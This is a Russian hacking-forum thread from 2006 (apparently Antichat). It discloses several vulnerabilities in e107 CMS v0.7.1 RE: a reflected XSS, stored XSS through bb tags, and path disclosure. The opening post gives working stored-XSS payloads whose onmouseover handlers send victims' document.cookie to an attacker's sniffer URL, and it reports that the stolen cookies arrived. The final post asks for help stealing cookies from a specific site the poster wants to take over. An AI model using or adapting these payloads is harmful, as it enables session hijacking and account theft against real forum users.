PDA

Просмотр полной версии : Многочисленные уязвимости e107 v0.7.1 RE


vectorg
11.05.2006, 00:07
Многочисленные уязвимости e107 v0.7.1 RE
_http://e107.ru/


1. Пасивная XSS

_http://e107.ru/news.php/<script>alert(document.cookies)</script>Толку от неё мало, но вдруг кому-нибудь понадобится :)

2. Активные XSS

Здесь всё более серьёзно...
Итак, уязвимы bb теги, фильтруется символ < и иногда ", остальное пропускается.

а) xssНа выходе получаем:

<span style='font-size:22px' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' px'>xss</span>Как только жертва проводит мышкой по ссылке, cookies отправляются на ваш сниффер.

б) [img*]http://www.lifecity.us/phpBB2/images/smiles/icon_smile.gif' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' [/img*]
* - убратьНа выходе получаем:

<img src='http://www.lifecity.us/phpBB2/images/smiles/icon_smile.gif' onmouseover='img = new Image(); img.src = 'http://site.ru/cgi-bin/s.jpg?'+document.cookie;' ' class='bbcode' alt='' style='vertical-align:middle; border:0' />Как только жертва проводит мышкой по картинке, cookies отправляются на ваш сниффер.

Эти bb теги используются для написания сообщений на форуме, и изменения данных в профиле.
Все было проверено мной на: IE 7 Beta, Opera 8.54 и Firefox 1.5.0.3, все cookies пришли ;)

3. Раскрытие пути

На закуску :)

_http://e107.ru/e107_plugins/content/plugin.php
_http://e107.ru/e107_plugins/list_new/plugin.php

Их очень много, в основном в файлах, находящихся в папке e107_plugins.


Antichat.ru © VectorG

Tem
11.05.2006, 09:05
Ну и ешё пару листингов _http://e107.ru/e107_plugins/poll/

Nightmarе
08.08.2007, 08:16
Народ помогите плиииз!!!!!!!!!!!
Кароче я один сайт поиметь хотел... там стоит форум системы e107, я нашёл там XCC:
</textarea>'"><script>alert(document.cookie)</script>
Правда она работает лишь при нажатии на кнопку "Просмотр", сайт к сожалению назвать не смогу....
В общем как мне грамотно фрейм составить??? я не знаю как мне сделать пост запрос... там нету таких вещей как &, а юзаются точки... скорее там с помощью js пост запрос передаётся.... Но я думаю можно как то с помощью данной ХСС куки тянуть...